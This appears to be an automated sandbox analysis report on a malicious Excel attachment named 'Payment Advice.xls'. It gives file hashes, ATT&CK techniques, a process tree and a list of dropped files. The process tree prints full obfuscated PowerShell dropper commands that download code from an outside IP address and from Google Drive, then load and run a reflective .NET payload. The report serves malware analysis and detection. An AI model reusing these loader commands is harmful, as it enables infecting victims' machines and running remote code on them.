7b75ff23cf680717091181e61002f59e66a118302af798fc031548aead7a6af4

Analysis

max time kernel
117s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
29-10-2024 08:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment Advice.xls
Size

1.0MB
MD5

d6ad3108a8014d64c39ae1fe463112c5
SHA1

f5bb7665aa11ad21d9fa117a6e7b270c533a5844
SHA256

7b75ff23cf680717091181e61002f59e66a118302af798fc031548aead7a6af4
SHA512

3bae03cb73bceae2e54255833d92cb2cf0a6e3b826997b4754909c103508b79734df24bd1e42161a292e30e83232569eecfb1d23d85856564a6b12dfc62b735f
SSDEEP

12288:6mzHJEyfN1YVuBPT39LZEBD3DERnLRmF8DHFg6pvXlc857Jw6b4EJvQJwuXAw79r:9hfgVY3YBbARM8bF9pfW2GH5wa73N

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	2756	mshta.exe
11	2756	mshta.exe
13	344	PoWerShELL.eXE
15	2012	powershell.exe
17	2012	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2144	powershell.exe
2012	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
344	PoWerShELL.eXE
1404	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PoWerShELL.eXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWerShELL.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2208	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
344	PoWerShELL.eXE
1404	powershell.exe
344	PoWerShELL.eXE
344	PoWerShELL.eXE
2144	powershell.exe
2012	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	344	PoWerShELL.eXE
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2208	EXCEL.EXE
2208	EXCEL.EXE
2208	EXCEL.EXE
2208	EXCEL.EXE
2208	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2756 wrote to memory of 344	2756	mshta.exe	33
PID 2756 wrote to memory of 344	2756	mshta.exe	33
PID 2756 wrote to memory of 344	2756	mshta.exe	33
PID 2756 wrote to memory of 344	2756	mshta.exe	33
PID 344 wrote to memory of 1404	344	PoWerShELL.eXE	35
PID 344 wrote to memory of 1404	344	PoWerShELL.eXE	35
PID 344 wrote to memory of 1404	344	PoWerShELL.eXE	35
PID 344 wrote to memory of 1404	344	PoWerShELL.eXE	35
PID 344 wrote to memory of 2620	344	PoWerShELL.eXE	36
PID 344 wrote to memory of 2620	344	PoWerShELL.eXE	36
PID 344 wrote to memory of 2620	344	PoWerShELL.eXE	36
PID 344 wrote to memory of 2620	344	PoWerShELL.eXE	36
PID 2620 wrote to memory of 2872	2620	csc.exe	37
PID 2620 wrote to memory of 2872	2620	csc.exe	37
PID 2620 wrote to memory of 2872	2620	csc.exe	37
PID 2620 wrote to memory of 2872	2620	csc.exe	37
PID 344 wrote to memory of 1784	344	PoWerShELL.eXE	39
PID 344 wrote to memory of 1784	344	PoWerShELL.eXE	39
PID 344 wrote to memory of 1784	344	PoWerShELL.eXE	39
PID 344 wrote to memory of 1784	344	PoWerShELL.eXE	39
PID 1784 wrote to memory of 2144	1784	WScript.exe	40
PID 1784 wrote to memory of 2144	1784	WScript.exe	40
PID 1784 wrote to memory of 2144	1784	WScript.exe	40
PID 1784 wrote to memory of 2144	1784	WScript.exe	40
PID 2144 wrote to memory of 2012	2144	powershell.exe	42
PID 2144 wrote to memory of 2012	2144	powershell.exe	42
PID 2144 wrote to memory of 2012	2144	powershell.exe	42
PID 2144 wrote to memory of 2012	2144	powershell.exe	42

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Payment Advice.xls"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2208

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2756
- C:\Windows\SysWOW64\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE
  "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:344
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6ntc3efg.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4FA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF4F9.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2872
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1784
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2144
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
03590ce23b85e6ee50ec374b72e5a2fd

SHA1
0f4aa87610da80db76bcc5cedbf8a8d016a43074

SHA256
19185b9cf839c5ec809b09cd62eb1dd8e0ebb4613fc5332c3ec80df470535836

SHA512
4a5de97723892bd21d9817875bdfc5961052a32a0d8174825477e638856dd82c633b8b8f21b65ad6cb53547b26ead2ff668ce67811c883a82d86447df95cf4a4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
4a81adc7c3d7dccf47e5fdf2607c0402

SHA1
e6c1b3ad791e0f1e85e9b7a40bd5ba6de9cc03e1

SHA256
ddc0b12e57d74b50857a93cbc993725fe1a48894b2a80accea92f6d364c8115d

SHA512
a1191d78aaec3c09662437b546a9ec13ee7100f225f3539c02644b2f71974873bbb1bbf1e7c6c37b594a5ee979922167a3c30f96d0cbf00e0c22522c227aefc1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme[1].hta

Filesize
8KB

MD5
484722c4dc61d6b8e457d700d2d66cca

SHA1
739c7f51ac45902d9e6a184c5768499c20d24723

SHA256
0a4f27f8ccd9e3c22b0c97bb8ee33226d664c6242aaa0c1cab3a4a12406d5a3a

SHA512
d6909ecb886d0d2d8cbfb0e8644f31347b76ec9f22b00850d78d0386c7951113c9aa31e06c1feb168221bef925504c3384837e4e752f99386f03d2edf3dd8563

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ntc3efg.dll

Filesize
3KB

MD5
d781ba46cbfbefb6271f221c98806127

SHA1
2002ffc0683f99f45db372c128b6be7b095e2827

SHA256
c6fe6aad5bf42c87173ee8a653278fea44c251ddcd415e5121bbcf6b650af698

SHA512
26d4042a0ac4173baf5b3200f2fca82205cee47e57c4b55abf12423053514e9ff5d71e023134337220b519d34b3b25f15cb1fc6e8cc9e002cb36a2edffdcd73f

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ntc3efg.pdb

Filesize
7KB

MD5
35499782aeb56b67ff3e3f477dd6203a

SHA1
06bd4f31037c94d183153dee421148e3ac8c72a7

SHA256
1b37bcc3dc53acc769b4e99db91e59dbbf780c9a7a317f8d7f026c5997cdde96

SHA512
8669003a4f048bfc9889c11ec784749102b76fe477eb80d480f74786e163cb6e6a5520d181842cc73929212a1e2800eaa4a37f63329b4ab889e4b7ffb66f75ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE975.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF4FA.tmp

Filesize
1KB

MD5
b4069270318cb0c60764124d6fdfb45b

SHA1
62f477bf7cc1e3410bb3ef943fbdcfdb736f0d3c

SHA256
7c441fcc5c2a3be989084d11fa423de873f753cc5b904ae0498b63f79b020f35

SHA512
d946fa7116df7575aca422bbfae0bc252eea719fecc102297fb32553273f91e53a5f1321ca9c22d0b4aeac10d4f1063edb147e95d3fc95424848b24d6aedbcf8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
dafd38a51564e16c80cd2970d0b691a0

SHA1
64e71eeabd85a195ae0f1923e119aa3775d7b3c1

SHA256
c3a7709e073a4da2366dd1f10eb95e057eed458e569f0c53df6f8c579daa4386

SHA512
e705140993c335f64171c29dfd284267df8728d0b9e5eb536644c6587dbf5e016601c04997e23bf978de82a5e48cdc5861003582115747ef436ada3170d35866

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
97370647967e167782588dbce4fc5fb2

SHA1
022387452bb9fcaf8a52a4f08e2842e1efbea53d

SHA256
539a6c6b5185bab11911b43869d4063c334389d6cd7d2b168829f7eeda4994b9

SHA512
922ee40921a86476b035fb591ecd0fa604c0a667ab47bc83cd4f65124b68c364bc376d902530b219bf3510ec39a11fd1f780618e29433be627fb703a0bf7f1d2

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS

Filesize
137KB

MD5
bf515f00df29b4be31ac6e43ab05cd88

SHA1
29073164d5fdfd336c332321ebd8c01920438a8b

SHA256
50b9f7f3880e858ac733e7a7fb6b679e699c8bc9553948d04b2c15194b7520dc

SHA512
6ebb327de4fd7dc7d348ec32c7d7cc9d79bd2753fae2e29f7910e27d52091c6765e6ec6c0e982156661e9b80fe223c831cc739956624ef66262adffa1174ada7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6ntc3efg.0.cs

Filesize
462B

MD5
bf57b8e732d7b6222960bf1d5dd5df18

SHA1
0cda321126a9876c2881199b2940c05492b0d94f

SHA256
f77463e3272af620bc1620c10233f07a3e1c43b77d053a3477a92579b912ccfc

SHA512
9ed1f51736815946772533e380020b0de4c449aaa72db6b2ce29d7eab458216dd8fa9b9333a07164c72290d758412dcbab51099da031ed465ee62f73a14cfabb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6ntc3efg.cmdline

Filesize
309B

MD5
f6d912cbfd73c04adb3e1d8106022318

SHA1
eeb8e828b5f01ee5394f1de7827d7dd702d11965

SHA256
2242d1fcdd9264b34535f591d9feb601b6242a05162c513448c6cc3a965f90a3

SHA512
09cae96e679d0a1fe5a3e236d1b92ba4f4a91a831911b3142bd9b578abeef2d71bdec4b15b83a1d2b7f5d38a8015ae2e68c0658634ee06e1335c7ca27ae2dabb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCF4F9.tmp

Filesize
652B

MD5
b8b80920d7fcf0a281612316ad6d5c45

SHA1
1a3a1cb30a675d471b631bbfbcfe060eee513563

SHA256
9ac7e38dc2eb23dea9f7cb920da7e982a30704a2c7b48189a0aee873d8c39a23

SHA512
2e6e99036f55af0e13ff289e1a86014eba090f41b7fc4e4b88b2ab419bf69a37b3437571b6f56ce458de2543d045254937ecb73c1b38feb3cb12e7bff3761dc4

Download Submit
memory/2208-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2208-60-0x000000007229D000-0x00000000722A8000-memory.dmp

Filesize
44KB

Download
memory/2208-1-0x000000007229D000-0x00000000722A8000-memory.dmp

Filesize
44KB

Download
memory/2208-17-0x0000000002480000-0x0000000002482000-memory.dmp

Filesize
8KB

Download
memory/2756-16-0x0000000002520000-0x0000000002522000-memory.dmp

Filesize
8KB

Download